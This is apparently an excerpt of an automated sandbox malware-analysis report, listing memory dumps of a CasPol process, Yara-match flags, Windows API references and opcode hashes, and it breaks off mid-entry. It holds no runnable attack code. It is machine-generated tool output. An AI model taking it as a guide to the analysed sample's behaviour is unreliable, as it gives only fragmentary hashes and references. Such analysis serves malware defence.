                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: 6bd799bfac9af36fd133eb5d72b5b36b41e76e7aabeb18fd4f2c376b7933ddb9
                                                                                                • Instruction ID: 58a0a1dc03b065be57d87c6409a63545e464c60cfee5b8c381720ea1698dad41
                                                                                                • Opcode Fuzzy Hash: 6bd799bfac9af36fd133eb5d72b5b36b41e76e7aabeb18fd4f2c376b7933ddb9
                                                                                                • Instruction Fuzzy Hash: A0F0F631640318B7DB056F61CC06F6E7B64DB04712F10019AFC0467252CF75AB119A9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49a3bfabf79a65c690f97e76fe456cb77f79ea6cd6c50daa38502d700b1f7d22
                                                                                                • Instruction ID: e2cf6eb340ac48f4c2d61266dea52d41f096047f3e1279b99095df37311d6468
                                                                                                • Opcode Fuzzy Hash: 49a3bfabf79a65c690f97e76fe456cb77f79ea6cd6c50daa38502d700b1f7d22
                                                                                                • Instruction Fuzzy Hash: 6A023D71E002199BEF14CFA9C9806AEB7F1FF48314F15826AD919E7354D734AE41CB94
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                                                • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004522DD,?,?,00000008,?,?,00455622,00000000), ref: 0045250F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                                                                                                • Instruction ID: f5116c66f7d103febd2a8608562706e5703b7900b8c4b7f838cfdcb30f3e5b5c
                                                                                                • Opcode Fuzzy Hash: d07e5f888e39d313e61fc9618f59c4e8dd55f143eba3426c2705e6c45139c68f
                                                                                                • Instruction Fuzzy Hash: A3B19D312106089FD714CF28C586B557BE0FF06366F29865AEC9ACF2A2C379D986CB44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: b6bf49add14664c6f8016bf54831dc2d1fc9c90be302da46ea9abcdaf86f1ea8
                                                                                                • Instruction ID: 31134252bc459ed72560d692cedbd99cf1c15514e9e569b0755b2466d1e16266
                                                                                                • Opcode Fuzzy Hash: b6bf49add14664c6f8016bf54831dc2d1fc9c90be302da46ea9abcdaf86f1ea8
                                                                                                • Instruction Fuzzy Hash: 0B0285327083418BD714DF29D951B2EF3E1BFCC768F15892EF4899B381DA78A8058B85
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045131E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                • String ID:
                                                                                                • API String ID: 1663032902-0
                                                                                                • Opcode ID: bc85fdc09d4fce3dfbe50538f39d64f32c4b6099e2a05669c9b1daebb1f6e385
                                                                                                • Instruction ID: 0b21b5069fbf1db5bec531630a8d3eee6f1f474d64bb54c6a1c44a3d8e2cc721
                                                                                                • Opcode Fuzzy Hash: bc85fdc09d4fce3dfbe50538f39d64f32c4b6099e2a05669c9b1daebb1f6e385
                                                                                                • Instruction Fuzzy Hash: 2221D372501206ABEB24AB25CC61B7B77ACEB04316F10017BFD01D6663EB78AD49CB58
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                • EnumSystemLocalesW.KERNEL32(0045107A,00000001), ref: 00450FC4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 3a31ee2cb7c3b3c30c37b94e670f2ddef0fa81747a728ef240a23d519bfda7de
                                                                                                • Instruction ID: 451a354658792f2252a151bea30e2a99c0585190810680eeac5085bd3c0c80bb
                                                                                                • Opcode Fuzzy Hash: 3a31ee2cb7c3b3c30c37b94e670f2ddef0fa81747a728ef240a23d519bfda7de
                                                                                                • Instruction Fuzzy Hash: FD11293B2007019FDB28AF39C8916BABB92FF8435AB14442DE94747B41D7B9B847C744
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451298,00000000,00000000,?), ref: 00451526
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 2692324296-0
                                                                                                • Opcode ID: 65873bc9ae658601702fce3b4691c0f84d14bd9d1f181d1891b0da6269130a50
                                                                                                • Instruction ID: d2fe2c3fce417e68b0623dfb5eb434355baf81d8c10f12b7a8aa08190ad777f0
                                                                                                • Opcode Fuzzy Hash: 65873bc9ae658601702fce3b4691c0f84d14bd9d1f181d1891b0da6269130a50
                                                                                                • Instruction Fuzzy Hash: 4AF0F9326102197BDB289A258C46BBB7758EB80755F04046AEC07A3251FA78FD45C6D4
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                • EnumSystemLocalesW.KERNEL32(004512CA,00000001), ref: 00451039
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 142a5ab68110d3ae4ae2a29f4ede4cfe4962a86309bdabf20196800783e96c86
                                                                                                • Instruction ID: 969c50ee721750b2a7664082bdad3607fc28c6e2ba06475257799e5d9796a5a7
                                                                                                • Opcode Fuzzy Hash: 142a5ab68110d3ae4ae2a29f4ede4cfe4962a86309bdabf20196800783e96c86
                                                                                                • Instruction Fuzzy Hash: 19F028363003045FDB245F76DC81B7B7B95EF8075DF04442EFD4187A92D6B99C828604
                                                                                                APIs
                                                                                                  • Part of subcall function 00444CDC: EnterCriticalSection.KERNEL32(-00472558,?,0044246B,00000000,0046EAD0,0000000C,00442426,0000000A,?,?,00448949,0000000A,?,00447184,00000001,00000364), ref: 00444CEB
                                                                                                • EnumSystemLocalesW.KERNEL32(Function_00047278,00000001,0046EC58,0000000C), ref: 004472F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: ce5d864c7127ce76761e0cbea026e968eb5e88cd2d94c9e55423b39c5525c7e8
                                                                                                • Instruction ID: acebf021cc54f47487df9b00313a15cc1bfd22b3d47c3c45ccbcf72c34342655
                                                                                                • Opcode Fuzzy Hash: ce5d864c7127ce76761e0cbea026e968eb5e88cd2d94c9e55423b39c5525c7e8
                                                                                                • Instruction Fuzzy Hash: 97F06236620200DFEB10EF79DE46B5D37E0EB44715F10816AF414DB2A1CBB89981DB4D
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                • EnumSystemLocalesW.KERNEL32(00450E5E,00000001), ref: 00450F3E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: c0752d91e59c0ec8caa35cedbb84099f1f2f8e555a7fabae98b3644acfac0ab5
                                                                                                • Instruction ID: 7585e2e2e927d60b614fbbb7cbec4ece609ea7599c31e6a5607aeddcbc8761df
                                                                                                • Opcode Fuzzy Hash: c0752d91e59c0ec8caa35cedbb84099f1f2f8e555a7fabae98b3644acfac0ab5
                                                                                                • Instruction Fuzzy Hash: 89F0E53A30020557CB28AF35D845B6A7F94EFC1715B16449EFE098B252C67AD886C794
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033EEE,00433BBC), ref: 00433EE7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: e588410f7d772084ad9b5e6a201b2d06307ba3208cc6e1757a1b1bd45e9a1e30
                                                                                                • Instruction ID: 9bcc487b38fe881941be7e97ad5738302595bcb4dafebc2e14986f4c0a09dd7d
                                                                                                • Opcode Fuzzy Hash: e588410f7d772084ad9b5e6a201b2d06307ba3208cc6e1757a1b1bd45e9a1e30
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                • Instruction ID: 918b0ebc11a623be2c3a075c7dacafa9f372a23f1c3751216f0e188bc6ec1ae1
                                                                                                • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                • Instruction Fuzzy Hash: 75416771A087158FC314CE29C48162BFBE1FFC8310F648A1EF98693350D679E984CB86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NG
                                                                                                • API String ID: 0-1651712548
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: 1c32571a3dfe778fa5c185cf8bc6913e7641393edb8458615b62c9d9f031e262
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: AA11E6F724C08243D635862DC4B46BBA795EBCD321F2C626BDCC24B758D23AA945F908
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: daa15e32a72831e46b3c61932d047b022fcf8146eeed5cebd1c5d41c65fd85a6
                                                                                                • Instruction ID: 9a438bc9e2fc22055b190f670ef66c3370438dec1b294d2ef7e2678560d22162
                                                                                                • Opcode Fuzzy Hash: daa15e32a72831e46b3c61932d047b022fcf8146eeed5cebd1c5d41c65fd85a6
                                                                                                • Instruction Fuzzy Hash: BE325721D29F014DE7279A35C8623366689AFBB3C5F14D737F819B5AA6EF2CC5830105
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7f4af8b37f4defc4199b161d53b4d96f103fc90b589b5ac19ca4300a5eebd0f3
                                                                                                • Instruction ID: c1435a2baeed09a5a3259e0536aa218d1a742a19b3e0efe55a8499c03c4c3cac
                                                                                                • Opcode Fuzzy Hash: 7f4af8b37f4defc4199b161d53b4d96f103fc90b589b5ac19ca4300a5eebd0f3
                                                                                                • Instruction Fuzzy Hash: C332A1756087569BC715DF2AC4807ABB7E1BF84304F044A2EFC958B381D778DD868B8A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49923ba0373965d58fe21e3a4a04a2e805efb906394084f823fc6768166e364a
                                                                                                • Instruction ID: ba505550dfe6ff667973af58f2e26a28558ab2450a604d8934fff0a0de9d4b4c
                                                                                                • Opcode Fuzzy Hash: 49923ba0373965d58fe21e3a4a04a2e805efb906394084f823fc6768166e364a
                                                                                                • Instruction Fuzzy Hash: E002A071B145528FE318CF2EEC90536B7E1AB8D301745867EE486C7381EB74E922CB99
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 14f2c04f30688e9b56e2fb3764798841ed8a236a41f0f424bf7fd8b45a1b82b0
                                                                                                • Instruction ID: 5a71f349ba3f9fd68778d37660bff7a0658bdf00a392eb754e277e7013b3f26f
                                                                                                • Opcode Fuzzy Hash: 14f2c04f30688e9b56e2fb3764798841ed8a236a41f0f424bf7fd8b45a1b82b0
                                                                                                • Instruction Fuzzy Hash: 01F17171A142558FD304DF1DE89187B73E4FB89301B44092EF183D7391DA74EA19CBAA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a8269e18aa3b2fd96c1213e9b8022c4c073f53bdae2f6b844dfaaafdf28db3f1
                                                                                                • Instruction ID: a41bb019b54bfded01c7b41d156f95a2cbb072d1dd28d49048bf85c092e0f3ee
                                                                                                • Opcode Fuzzy Hash: a8269e18aa3b2fd96c1213e9b8022c4c073f53bdae2f6b844dfaaafdf28db3f1
                                                                                                • Instruction Fuzzy Hash: 27D191B1A083158BC721DE69C490A5FB7E4BF88354F445A2EF8D597321E738DE09CB86
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                • Instruction ID: 3c41eba25cca95e3826e3c7b6cd4dae3ec9239a5c93a684b18aa23140a28fc10
                                                                                                • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                • Instruction Fuzzy Hash: A9B184795142998ACB05EF68C4913F63BA1EF6A300F0851B9EC9CCF757D3398506EB64
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction ID: ead0cef3b0fda5c4522f49b9ed51e98e8a5165699e21cbc4f344a2de8f03cfd9
                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction Fuzzy Hash: FF9198722090A35DDB29423E843403FFFE15A563A1B1B679FE4F3CB2C5ED28C5699624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction ID: 3a5f3f28e05ced0c476ae62a9fbfc87eb2deb37e5825eaa5068885373994e230
